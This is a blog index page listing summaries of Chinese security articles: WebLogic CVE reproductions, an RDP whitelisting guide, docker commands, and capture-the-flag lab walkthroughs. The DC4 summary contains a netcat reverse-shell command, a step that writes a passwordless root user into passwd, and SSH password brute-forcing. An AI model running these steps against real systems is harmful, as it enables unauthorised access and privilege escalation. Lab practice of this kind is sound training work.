自定义博客皮肤VIP专享

*博客头图:

格式为PNG、JPG,宽度*高度大于1920*100像素,不超过2MB,主视觉建议放在右侧,请参照线上博客头图

请上传大于1920*100像素的图片!

博客底图:

图片格式为PNG、JPG,不超过1MB,可上下左右平铺至整个背景

栏目图:

图片格式为PNG、JPG,图片宽度*高度为300*38像素,不超过0.5MB

主标题颜色:

RGB颜色,例如:#AFAFAF

Hover:

RGB颜色,例如:#AFAFAF

副标题颜色:

RGB颜色,例如:#AFAFAF

自定义博客皮肤

-+
  • 博客(13)
  • 收藏
  • 关注

原创 中标麒麟系统重置root用户密码(包含v6及其以上系统)

开机时在这个页面按回车键看到这个界面按e下滑选中第二个按e编辑在此处输入rw init=/bin/bash输入完成后点击回车键,回到此页面按b启动执行su进入单用户模式然后输入:passwd (用户名)就可更改密码改完后输入:/sbin/reboot -f 重启系统重启导登录时就可输入新更改的密码进行登录。

2024-07-18 14:53:04 1426

原创 应急响应主机排查方法

主机排查

2024-07-17 15:35:09 1117

原创 windows系统通过本地策略对远程桌面(3389端口)做白名单限制

当服务器要进行远程运维时,windows系统通常是使用3389远程桌面进行连接,此时就存在安全风险,要防止处运维人员以外的其他人连接获取服务器数据或篡改服务器。此时可以通过本地安全策略对连接人员进行限制,具体操作方法如下所示:在命令行输入:secpol.msc 打开本地安全策略。

2024-07-12 14:58:55 1087

原创 Oracle WebLogic Server Core 安全漏洞(CVE-2023-21839)复现

由于Weblogic IIOP/T3协议存在缺陷,当IIOP/T3协议开启时,允许未经身份验证的攻击者通过IIOP/T3协议网络访问攻击存在安全风险的WebLogic Server,漏洞利用成功WebLogic Server可能被攻击者接管执行任意命令导致服务器沦陷或者造成严重的敏感数据泄露。

2024-07-08 16:29:59 983

原创 docker常用命令

docker-compose config -q 验证(docker-compose.yml)文件配置,当配置正确时,不输出任何内容,当文件配置错误,输出错误信息。docker-compose events --json nginx 以json的形式输出nginx的docker日志。docker-compose -f docker-compose.yml up -d # 指定模板。docker-compose build --no-cache nginx 不带缓存的构建。

2024-07-05 14:47:14 401

原创 Oracle WebLogic Server 安全漏洞(CVE-2020-14882)复现

攻击者可通过构造特殊的 HTTP GET 请求,结合 CVE-2020-14883 漏洞进行利用,利用此漏洞可在未经身份验证的情况下直接接管 WebLogic Server Console ,并执行任意代码。

2024-07-05 14:45:10 835

原创 DC4靶机

将ls+-l改成nc -e /bin/sh 192.168.91.129 8888,点击forward放行。利用teehee的root权限在passwd中写入一个免密的root权限用户。进过查找, 在var目录发现mail,打开jim的邮件看看。对jim用户进行密码爆破,字典就用刚才找到的1.txt。登录成功,但是登录的时候它多出来一句话,可以翻译下看看。成功进入,但是进的时候要注意把用户大写的C换成小写。将所有密码拷贝,粘贴到kali的root目录下。找到了一个存放密码的文件。给和密码加上&准备爆破。

2023-04-06 22:23:32 143

原创 DC3靶机

找到了5个可用的数据库,结合我们之前找到的后台登录页面,有用的应该是jooomladb这个库。打开该文件,复制第16行内容在终端执行,执行完后会有几个需要确认的内容,y回车就可以了。交互一下:SHELL=/bin/bash script /dev/null。发现没有找到靶机,这也是很多靶机的问题,是靶机的网卡有问题,需要编辑一下。打开文档,文档拉到最下面,是EXP的下载地址,如下图。

2023-04-05 16:38:12 167

原创 打靶机常见问题汇总1

方法:a。

2023-04-03 22:23:20 433

原创 DC2靶机

发现它还开启了ssh,端口是7744,结合我们之前得到了账号和密码,直接就可以ssh远程登录。发现可以用sudo提权,让普通用户可以零时拥有root权限。使用cewl爬取命令,生成一个针对dc-2的字典。经过尝试,jerry登录失败,但是tom登录成功。进来后发现很多命令不可用,需要绕过-rbash。它开启了80端口,我们尝试访问下它的网页。用dirb扫描后台,看看有什么重要的东西。经过查找,发下在这个网址下有一个后台登录。经过查找,终于找到了最后一个fiag。进去后经过查找,找到了flag2。

2023-04-03 22:09:56 193 1

原创 DC1靶机

确定靶机和kali在同一网络模式下。

2023-04-03 15:18:17 84 1

原创 potato靶机

确定kali自己的ip:192.168.91.139查找靶机的ip:nmap 192.168.91.0/24打开浏览器,输入靶机的ip地址是一个土豆potato,没有别的信息再详细扫描一下ip:nmap 192.168.91.143 -A -p-可以看到除了80端口,还开启了一个7120的ssh端口结合刚才的网页是一个土豆,可以猜测一下,它的用户名就是potato,我们使用九头蛇来进行密码爆破试一下爆破到了用户名:potato密码:letmein。

2023-04-02 18:04:38 748 1

原创 gaara我爱罗靶机(靶机6)

使用nmap扫描确定。

2023-03-28 21:29:50 304

空空如也

空空如也

TA创建的收藏夹 TA关注的收藏夹

TA关注的人

提示
确定要删除当前文章?
取消 删除